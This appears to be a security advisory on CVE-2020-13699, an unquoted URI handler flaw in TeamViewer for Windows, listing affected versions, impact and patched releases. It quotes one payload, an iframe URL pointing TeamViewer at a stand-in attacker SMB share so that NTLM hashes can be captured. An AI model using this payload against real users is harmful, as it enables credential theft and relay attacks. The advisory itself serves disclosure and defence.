CVE-2020-13699: 
TeamViewer Remote vulnerability analysis and mitigation

A high-risk vulnerability (CVE-2020-13699) was discovered in TeamViewer for Windows that could allow remote attackers to steal system passwords and potentially compromise affected systems. The vulnerability affects TeamViewer versions 8 through 15 (up to 15.8.2) for the Windows platform and was discovered by Jeffrey Hofmann from Praetorian. The flaw was disclosed and patched in July 2020 (Help Net Security, Hacker News).

The vulnerability is categorized as an Unquoted Search Path or Element (CWE-428) vulnerability, arising from TeamViewer not properly quoting its custom URI handlers. It affects multiple URI handlers including teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1, and tvvpn1. The attack can be executed by embedding a malicious iframe with a crafted URL (teamviewer10: --play \attacker-IP\share\fake.tvs) that forces TeamViewer to open a remote SMB share (Bleeping Computer).

When successfully exploited, the vulnerability allows attackers to capture NTLM authentication requests, which can be relayed for code execution or used for password hash cracking. The attack can be executed remotely without requiring authentication and with minimal user interaction, making it particularly dangerous for targeted attacks (Hacker News).

TeamViewer released patches for all affected versions. Users should upgrade to one of the following patched versions: 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, or 15.8.3. The fix involves properly quoting the parameters passed by the URI handlers (TeamViewer Community).

TeamViewer acknowledged the vulnerability and thanked the researcher for following responsible disclosure practices. The company promptly released patches and communicated the issue through their community forums and official channels (TeamViewer Community).